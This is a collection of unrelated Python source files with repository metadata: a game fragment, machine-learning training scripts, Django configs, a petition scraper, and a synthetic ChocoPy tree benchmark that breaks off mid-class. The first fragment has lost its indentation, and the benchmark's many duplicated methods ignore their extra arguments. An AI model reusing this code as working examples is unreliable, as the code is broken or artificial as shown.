y = Grid.y)
self.inputDelay = Selector.inputDelay
def update(self):
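        # inputDelay debounces keyboard polling: a 10-frame cooldown keeps a single key press from registering on every frame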
if self.inputDelay > 0:
self.inputDelay -= 1
elif self.inputDelay == 0:
if games.keyboard.is_pressed(games.K_LEFT):
self.x = self.x - 50
self.inputDelay = 10
if games.keyboard.is_pressed(games.K_RIGHT):
self.x = self.x + 50
self.inputDelay = 10
if games.keyboard.is_pressed(games.K_UP):
self.y = self.y - 50
self.inputDelay = 10
if games.keyboard.is_pressed(games.K_DOWN):
self.y = self.y + 50
self.inputDelay = 10
if games.keyboard.is_pressed(games.K_SPACE):
print(self.overlapping_sprites[0].name)
print(self.x)
print(self.y)
self.inputDelay = 10
if games.keyboard.is_pressed(games.K_d):
for sprite in self.overlapping_sprites:
sprite.die()
            # add ocean at the cursor
if games.keyboard.is_pressed(games.K_o):
ocean = Ocean(self.x, self.y)
games.screen.add(ocean)
self.elevate()
self.inputDelay = 10
            # add land at the cursor
if games.keyboard.is_pressed(games.K_p):
land = Land(self.x, self.y)
games.screen.add(land)
self.elevate()
self.inputDelay = 10
#add destroyer
if games.keyboard.is_pressed(games.K_i):
des = Destroyer(self.x, self.y)
games.screen.add(des)
self.elevate()
self.inputDelay = 10
class Pointer(object):
    def __init__(self):
        self.background = games.load_image("graphics/pointer.png", transparent = False)
class Menu(object):
    def __init__(self):
        self.background = games.load_image("graphics/menuBackground.png", transparent = False)
    def show(self):
        games.screen.add(self.background)
class Game(object):
"""the game"""
def newGameMenu(self):
menu_image = games.load_image("graphics/MenuBackground.png", transparent = False)
def play(self):
#create empty grid
x = 0
y = 0
#add basic grid
for i in range(16):
x = x + 50
y = 0
for j in range(16):
y = y + 50
grid = Grid(x, y)
games.screen.add(grid)
        # add selection cursor
selector = Selector(grid)
games.screen.add(selector)
wall_image = games.load_image("graphics/testBack.png", transparent = False)
games.screen.background = wall_image
games.screen.mainloop()
def main():
gameStart = Game()
gameStart.play()
main()
|
[
"sms632@gmail.com"
] |
sms632@gmail.com
|
a3a6a41f385fb6a0269c8f974db2ab292bb42810
|
1faf8c112d6e98afe64b4df91d0f7e730c27e0a7
|
/XGBoost.py
|
de02efabcb90c37c67df39faed48c72a41baa07d
|
[] |
no_license
|
Shinarthas/XGBoost
|
eff309c3dced28fc127b4024c5d6f3e745a3d76d
|
46e221abc23dc67fb7588fa37f18277e7df92240
|
refs/heads/master
| 2022-12-05T01:55:12.501075
| 2020-08-19T21:06:55
| 2020-08-19T21:06:55
| 288,837,727
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,250
|
py
|
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
dataset = pd.read_csv('Data.csv')
X = dataset.iloc[:, :-1].values # all columns except the last
y = dataset.iloc[:, -1].values # only the last column
# split the data into training and test sets
from sklearn.model_selection import train_test_split
X_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.2, random_state=1) # random_state=1 fixes the seed so the split is always the same
# feature scaling
from sklearn.preprocessing import StandardScaler
ss=StandardScaler() # expresses each value as a number of standard deviations from the mean
X_train[:,3:]=ss.fit_transform(X_train[:,3:]) # fit the scaler on the training set and transform it
# fit_transform (1) fits the transformation model, then (2) transforms the data with it
X_test[:,3:]=ss.transform(X_test[:,3:]) # transform only: the scaler was just fitted, so the mean and deviation are already computed
#Training XGBoost on the training set
from xgboost import XGBClassifier
classifier=XGBClassifier()
classifier.fit(X_train, y_train)
# Making the Confusion Matrix
from sklearn.metrics import confusion_matrix, accuracy_score
y_pred = classifier.predict(X_test)
cm = confusion_matrix(y_test, y_pred)
print('--XGBoost--')
print(cm)
print(accuracy_score(y_test, y_pred))
#applying k-fold cross validation
from sklearn.model_selection import cross_val_score
# runs everything through N iterations; the training and validation folds differ each time, all within the training set
accuracies=cross_val_score(estimator=classifier,X=X_train,y=y_train,cv=10)
print("Accuracy {:.2f} %".format(accuracies.mean()*100))
print("Standard Deviation {:.2f} %".format(accuracies.std()*100))
|
[
"tttaaabbb@gmail.com"
] |
tttaaabbb@gmail.com
|
dd1221db4a088cf90bcdefff2c489c4642863126
|
9c3934402046850104523e9d942d62e42175b512
|
/theblog/urls.py
|
e8d6cd26d99ae97986d6defb2b4be29934047079
|
[] |
no_license
|
Dekatron322/myblog
|
39954bf26ac7468dae2e888aba1a1855a0832835
|
4d4118eecb458dc53073cd8c3ff9eaa0235926c8
|
refs/heads/master
| 2022-06-18T07:01:57.218863
| 2020-05-08T08:35:57
| 2020-05-08T08:35:57
| 262,269,197
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 531
|
py
|
from django.urls import path, include
from . import views
urlpatterns = [
path('', views.index, name="index"),
path('blog/', views.blog, name="post-list"),
path('post/<id>/', views.post, name="post-detail"),
path('search/', views.search, name='search'),
path('tinymce/', include('tinymce.urls')),
path('post/<id>/update', views.post_update, name="post-update"),
path('post/<id>/delete', views.post_delete, name="post-delete"),
path('create/', views.post_create, name="post-create"),
]
|
[
"muritalaibrahim097@gmail.com"
] |
muritalaibrahim097@gmail.com
|
ba63a3a0d366b8dda91ff26b399b9d95d20616da
|
f4878f730033b8a4780bcca5c957232fdcbe132f
|
/backend/cron_service/apps.py
|
fd8595ddd05bac11e77707007ae0819e6224d33d
|
[] |
no_license
|
edwardsujono/information_retrieval
|
d29b007d19a8c687d314a65aa87442bc3c19239b
|
8b4a2ca7483c855e173eae43aac65d2b9dc0ee1d
|
refs/heads/master
| 2022-12-13T03:23:16.804343
| 2018-06-27T09:07:56
| 2018-06-27T09:07:56
| 120,317,716
| 0
| 0
| null | 2022-11-04T19:17:50
| 2018-02-05T14:45:22
|
Python
|
UTF-8
|
Python
| false
| false
| 98
|
py
|
from django.apps import AppConfig
class CronServiceConfig(AppConfig):
name = 'cron_service'
|
[
"edwardsujono81@gmail.com"
] |
edwardsujono81@gmail.com
|
d1f4fd1c4dac2532a9b867e1f6f280506af13056
|
4cc40da438b404be9f5fdaa35fddd8fb9fb3d46b
|
/branched-CNN.py
|
f276948126dd1984a779a042df787cb6630d7f4c
|
[] |
no_license
|
vlimant/summer16-NikolausHowe
|
266e993864342b13e0f12cf70a313a192e2488db
|
b58fe9b4ffa068dd6584d8ce5d9bada83c40f0b6
|
refs/heads/master
| 2021-01-17T10:18:01.519593
| 2016-06-14T18:10:06
| 2016-06-14T18:10:06
| 59,652,326
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,417
|
py
|
# coding: utf-8
# # Branched Convolutional NN
# Import io functions
import setGPU0
from io_functions import *
from draw_functions import *
# ## Prepare the data
train_data, test_data, train_labels, test_labels = train_test(shape=(1, 20, 20, 25), split=0.33)
# ## Create and train the model
model1 = Sequential()
model1.add(Convolution3D(3, 4, 4, 5, input_shape = (1, 20, 20, 25), activation='relu'))
model1.add(MaxPooling3D())
model1.add(Flatten())
model2 = Sequential()
model2.add(Convolution3D(3, 3, 3, 4, input_shape = (1, 20, 20, 25), activation='relu'))
model2.add(MaxPooling3D())
model2.add(Flatten())
model3 = Sequential()
model3.add(Convolution3D(3, 5, 5, 6, input_shape = (1, 20, 20, 25), activation='relu'))
model3.add(MaxPooling3D())
model3.add(Flatten())
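## editor's note: the three branches apply 3-D convolutions with different
## kernel sizes (4x4x5, 3x3x4, 5x5x6) to the same input, so the merge below
## concatenates features from three receptive-field scales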
## join the three branches
bmodel = Sequential()
bmodel.add(Merge([model1,model2,model3], mode='concat'))
## fully connected ending
bmodel.add(Dense(1000, activation='relu'))
bmodel.add(Dropout(0.5))
bmodel.add(Dense(1, init='uniform', activation='sigmoid'))
bmodel.compile(loss='binary_crossentropy', optimizer='sgd')
bmodel.summary()
# Fit the model
fit_history = bmodel.fit([train_data, train_data, train_data], train_labels, nb_epoch=100, batch_size=1000, verbose=1)
# Get and save predictions
predictions = bmodel.predict([test_data, test_data, test_data])
store_model(bmodel, fit_history.history['loss'], 'bcnn', (predictions, test_labels))
|
[
"root@titans.hep.caltech.edu"
] |
root@titans.hep.caltech.edu
|
d28a215ec3464b1ddb53f92fdd49c009a6fe2f10
|
40cfe070ef7e11b98ca89b2507fb74180bc31970
|
/train.py
|
923c4c200cf5a9d8145ce491a8341ba55fce16f0
|
[] |
no_license
|
Cx-x-x-x/4Models
|
7b609d1d21cf4e971c91c18a02fdbce717b4d775
|
fd200b37bcf73fbad0ef033d6b9a99d341e60cd2
|
refs/heads/master
| 2022-10-08T23:42:01.805481
| 2020-06-12T09:20:30
| 2020-06-12T09:20:30
| 271,168,885
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,205
|
py
|
import os
import argparse
import time
from tensorboardX import SummaryWriter
import torch
from torch import nn
import torchvision
from torch import optim
from torchvision import transforms
from torchvision.datasets import ImageFolder
from torch.utils.data import DataLoader
from config import device, save_dir, MODEL, pthfile, Epoch, BatchSize, Optimizer, lr, wd, SaveFreq, tensorboard_dir
from filter_weight_decay import group_weight
writer = SummaryWriter('/Disk1/chenxin/runs/' + tensorboard_dir)
start = time.time()
# Argument parsing: lets options be supplied on the command line, Linux-CLI style
parser = argparse.ArgumentParser(description='PyTorch Training')
parser.add_argument('--outf', default='/Disk1/chenxin/model/' + save_dir,
help='folder to output images and model checkpoints')
args = parser.parse_args()
"""data"""
train_transform = transforms.Compose([transforms.Resize((299, 299)),
transforms.ColorJitter(brightness=0.05, contrast=0.05, saturation=0.05),
transforms.RandomHorizontalFlip(),
transforms.RandomVerticalFlip(),
transforms.RandomRotation(45),
transforms.ToTensor(),
transforms.Normalize([0.72033167, 0.4602297, 0.38352215], [0.22272113, 0.19686753, 0.19163243]),
])
test_transform = transforms.Compose([transforms.Resize((299, 299)),
transforms.ToTensor(),
transforms.Normalize([0.72033167, 0.4602297, 0.38352215], [0.22272113, 0.19686753, 0.19163243])])
train_dataset = ImageFolder('/Disk1/chenxin/LSID3_5_1/train0', transform=train_transform)
train_loader = DataLoader(dataset=train_dataset, batch_size=BatchSize,
shuffle=True, num_workers=40)
test_dataset = ImageFolder('/Disk1/chenxin/LSID3_5_1/test0', transform=test_transform)
test_loader = DataLoader(dataset=test_dataset, batch_size=BatchSize,
shuffle=False, num_workers=40)
""" model"""
model = MODEL
# load pth
model_dict = model.state_dict()
pretrained_dict = torch.load(pthfile)
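# keep only weights whose names do not contain 'fc', so the final fully-connected layer keeps its fresh initialization for this task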
pretrained_dict = {k: v for k, v in pretrained_dict.items() if 'fc' not in k}
model_dict.update(pretrained_dict)
model.load_state_dict(model_dict, strict=True)
# Loss and Optimizer
parameters = group_weight(model)
criterion = nn.CrossEntropyLoss()
if Optimizer == 'adam':
optimizer = optim.Adam(parameters, lr=lr, weight_decay=wd)
if Optimizer == 'sgd':
optimizer = optim.SGD(parameters, lr=lr, weight_decay=wd)
# learning rate decay
# lambda1 = lambda epoch: .1 if epoch > 39 else 1  # scale the LR by 0.1 after epoch 39
# scheduler = optim.lr_scheduler.LambdaLR(optimizer, lr_lambda=lambda1)
print(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
# train
if __name__ == "__main__":
if not os.path.exists(args.outf):
os.makedirs(args.outf)
    best_acc = 85  # initialize the best test accuracy
print("Start Training !") # 定义遍历数据集的次数
with open("test_acc_loss.txt", "w") as f, open("train_acc_loss.txt", "w") as f1, open("log.txt", "w")as f2:
for epoch in range(Epoch):
print('\nEpoch: %d' % (epoch + 1))
model.train()
sum_loss = 0.0
correct = 0.0
total = 0.0
for i, data in enumerate(train_loader, 0):
# prepare data
length = len(train_loader)
inputs, labels = data
inputs, labels = inputs.to(device), labels.to(device)
optimizer.zero_grad()
# forward + backward
outputs = model(inputs)
loss = criterion(outputs, labels)
loss.backward()
optimizer.step()
# scheduler.step() # todo
                # print the loss and accuracy after every training batch
sum_loss += loss.item()
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += predicted.eq(labels.data).sum()
print('[epoch:%d, iter:%d] Loss: %.03f | Acc: %.3f%% '
% (epoch + 1, (i + 1 + epoch * length), sum_loss / (i + 1), 100. * correct / total))
f2.write('%03d %05d |Loss: %.03f | Acc: %.3f%% '
% (epoch + 1, (i + 1 + epoch * length), sum_loss / (i + 1), 100. * correct / total))
f2.write('\n')
f2.flush()
            # record the training accuracy of the last batch of each epoch, for comparison with the test accuracy
f1.write('%03d %.3f%% %.03f' % (epoch+1, 100. * correct / total, sum_loss / (i + 1)))
f1.write('\n')
f1.flush()
# loss
writer.add_scalar('train_acc', 100. * correct / total, global_step=epoch)
# histogram
for name, param in model.named_parameters():
writer.add_histogram(name, param.clone().cpu().data.numpy(), epoch)
            # evaluate accuracy on the test set after each epoch
print("Waiting Test!")
with torch.no_grad():
correct = 0
total = 0
test_loss = 0.0
for data in test_loader:
model.eval()
images, labels = data
images, labels = images.to(device), labels.to(device)
outputs = model(images)
loss = criterion(outputs, labels)
test_loss += loss.item()
                    # take the class with the highest score (its index in outputs.data)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum()
acc = 100. * correct / total
                print('Test classification accuracy: %.3f%%' % (acc))
                # save the model every SaveFreq epochs
if (epoch + 1) % SaveFreq == 0:
print('Saving model......')
torch.save(model.state_dict(), '%s/net_%03d.pth' % (args.outf, epoch + 1))
                # write each epoch's test results to test_acc_loss.txt
f.write("%03d %.3f%% %.03f" % (epoch + 1, acc, test_loss / len(test_loader)))
f.write('\n')
f.flush()
                # record the best test accuracy and write it to best_acc.txt
if acc > best_acc:
f3 = open("best_acc.txt", "w")
f3.write("EPOCH=%d,best_acc= %.3f%%" % (epoch + 1, acc))
f3.close()
best_acc = acc
print("Training Finished, TotalEPOCH=%d" % Epoch)
print(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
end = time.time()
print("final is in ", end-start)
|
[
"1004058940@qq.com"
] |
1004058940@qq.com
|
2e8d96e368d310b51d62e922dc251c8951687ea3
|
8a00b3895a626cf539a526b62c517deea06971d4
|
/stage.py
|
9d9b0332b17a9699b9cb20e7429128322ce4261e
|
[
"MIT"
] |
permissive
|
SJang1/korea-president-petition-crawler
|
f77083cdfaa7efc38b4e39966259c47f310613d9
|
a377b098562a2c22748c437fd320cc8f7aabcdcb
|
refs/heads/master
| 2020-04-22T13:23:50.183111
| 2019-02-13T00:45:48
| 2019-02-13T00:45:48
| 170,407,752
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 806
|
py
|
import requests
from bs4 import BeautifulSoup
import time
import os
codes = ["522031"]
def crawl(code):
url = "https://www1.president.go.kr/petitions/{}".format(code)
data = requests.get(url)
return data.content
def user(string):
httprequest = BeautifulSoup(string, "html.parser")
wrapuser = httprequest.find("h2", {"class":"petitionsView_count"})
users = wrapuser.find("span", {"class":"counter"})
title = httprequest.find("h3", {"class":"petitionsView_title"})
timestamp = time.ctime()
return {"time":timestamp,"title":title.text, "agrees":users.text}
def main():
for code in codes:
predata = user(crawl(code))
f = open("output.txt", "a")
f.write(os.linesep + str(predata))
f.close()
time.sleep(150)
main()
|
[
"noreply@github.com"
] |
noreply@github.com
|
0578556910a5e7586de81a51629b513859639bf0
|
c56adc19280a64644db0610e123770b5a81f7cd0
|
/tools/tools_in_py/model_editor.py
|
32c5ddbb23b610f08e54150a9d9244d65d60616b
|
[] |
no_license
|
misabelber/LMC
|
060eeb57d2a546812a0e421596a88a741415eb79
|
df1d054842c0831e473298d9878df0ade8edefdb
|
refs/heads/master
| 2020-03-14T10:51:40.707716
| 2019-06-13T12:37:51
| 2019-06-13T12:37:51
| 131,577,794
| 1
| 3
| null | 2018-06-12T08:48:34
| 2018-04-30T09:30:32
|
C
|
UTF-8
|
Python
| false
| false
| 775
|
py
|
import gammalib
import math
import numpy as np
#Open model file
models = gammalib.GModels("../../models/LMC_model.xml")
centerRA = 80.0
centerDEC = -69.5
centerRA = math.radians(centerRA)
centerDEC = math.radians(centerDEC)
for model in models:
name = model.name()
tipo = model.type()
if tipo=="PointSource":
RA = model.spatial()["RA"].value()
dec = model.spatial()["DEC"].value()
RA = math.radians(RA)
dec = math.radians(dec)
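        # angular separation from the field centre via the spherical law of cosines:
        #   cos(theta) = sin(dec)*sin(centerDEC) + cos(dec)*cos(centerDEC)*cos(RA - centerRA)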
DA = math.sin(dec)*math.sin(centerDEC)+math.cos(dec)*math.cos(centerDEC)*math.cos(RA-centerRA)
DA = math.degrees(math.acos(DA))
        print(DA)
if DA > 6.:
for par in model:
par.fix()
models.save("../models/LMC_closer_files.xml")
|
[
"m.isabel.bernardos@gmail.com"
] |
m.isabel.bernardos@gmail.com
|
3d656918b0a1a22e90490255d65024864c89b8db
|
795e311122381d25101f459c4f6f95e3ffa32981
|
/day3/sz1.py
|
18c7a3be5c48ef0ad83c978b383e690db13a2d09
|
[] |
no_license
|
ljyxy1997/winter
|
7567df5eb55cf69b0cc17e898cb5bda0e7a5e578
|
c0f9228fc4c4ea91bacbb234d1351a8d1779b3a8
|
refs/heads/master
| 2023-04-13T21:32:49.337124
| 2021-04-27T12:17:06
| 2021-04-27T12:17:06
| 362,072,003
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 276
|
py
|
temp = input('Guess the number I picked')
num=int(temp)
while num!=8:
    num=int(input('Wrong, try again'))
    if num==8:
        print('Well done!')
    else:
        if num>8:
            print('Too big')
        else:
            print('Too small')
print('Done')
|
[
"ljyxy1997@163.com"
] |
ljyxy1997@163.com
|
08631b60708e517e228451d1629faaf2e74402f4
|
c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c
|
/cases/synthetic/tree-big-6757.py
|
b4b3b9f3005553b5202d6d4dff1c2e95e4d0376b
|
[] |
no_license
|
Virtlink/ccbench-chocopy
|
c3f7f6af6349aff6503196f727ef89f210a1eac8
|
c7efae43bf32696ee2b2ee781bdfe4f7730dec3f
|
refs/heads/main
| 2023-04-07T15:07:12.464038
| 2022-02-03T15:42:39
| 2022-02-03T15:42:39
| 451,969,776
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 23,289
|
py
|
# Binary-search trees
class TreeNode(object):
value:int = 0
left:"TreeNode" = None
right:"TreeNode" = None
def insert(self:"TreeNode", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode(x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode(x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode2(object):
value:int = 0
value2:int = 0
left:"TreeNode2" = None
left2:"TreeNode2" = None
right:"TreeNode2" = None
right2:"TreeNode2" = None
def insert(self:"TreeNode2", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode2(x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode2(x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode2", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode2(x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode2(x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode2", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode2", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode3(object):
value:int = 0
value2:int = 0
value3:int = 0
left:"TreeNode3" = None
left2:"TreeNode3" = None
left3:"TreeNode3" = None
right:"TreeNode3" = None
right2:"TreeNode3" = None
right3:"TreeNode3" = None
def insert(self:"TreeNode3", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode3", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode3", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode3", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode4(object):
value:int = 0
value2:int = 0
value3:int = 0
value4:int = 0
left:"TreeNode4" = None
left2:"TreeNode4" = None
left3:"TreeNode4" = None
left4:"TreeNode4" = None
right:"TreeNode4" = None
right2:"TreeNode4" = None
right3:"TreeNode4" = None
right4:"TreeNode4" = None
def insert(self:"TreeNode4", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode4", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode4", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode4", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode5(object):
value:int = 0
value2:int = 0
value3:int = 0
value4:int = 0
value5:int = 0
left:"TreeNode5" = None
left2:"TreeNode5" = None
left3:"TreeNode5" = None
left4:"TreeNode5" = None
left5:"TreeNode5" = None
right:"TreeNode5" = None
right2:"TreeNode5" = None
right3:"TreeNode5" = None
right4:"TreeNode5" = None
right5:"TreeNode5" = None
def insert(self:"TreeNode5", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode5", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode5", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode5", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class Tree(object):
root:TreeNode = None
size:int = 0
def insert(self:"Tree", x:int) -> object:
if self.root is None:
self.root = makeNode(x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree2(object):
root:TreeNode2 = None
root2:TreeNode2 = None
size:int = 0
size2:int = 0
def insert(self:"Tree2", x:int) -> object:
if self.root is None:
self.root = makeNode2(x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree2", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode2(x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree2", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree2", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree3(object):
root:TreeNode3 = None
root2:TreeNode3 = None
root3:TreeNode3 = None
size:int = 0
size2:int = 0
size3:int = 0
def insert(self:"Tree3", x:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree3", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree3", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree3", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree3", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree3", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree4(object):
root:TreeNode4 = None
root2:TreeNode4 = None
root3:TreeNode4 = None
root4:TreeNode4 = None
size:int = 0
size2:int = 0
size3:int = 0
size4:int = 0
def insert(self:"Tree4", x:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree4", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree4", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree4", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree4", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree4", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree5(object):
root:TreeNode5 = None
root2:TreeNode5 = None
root3:TreeNode5 = None
root4:TreeNode5 = None
root5:TreeNode5 = None
    size:int = 0
size2:int = 0
size3:int = 0
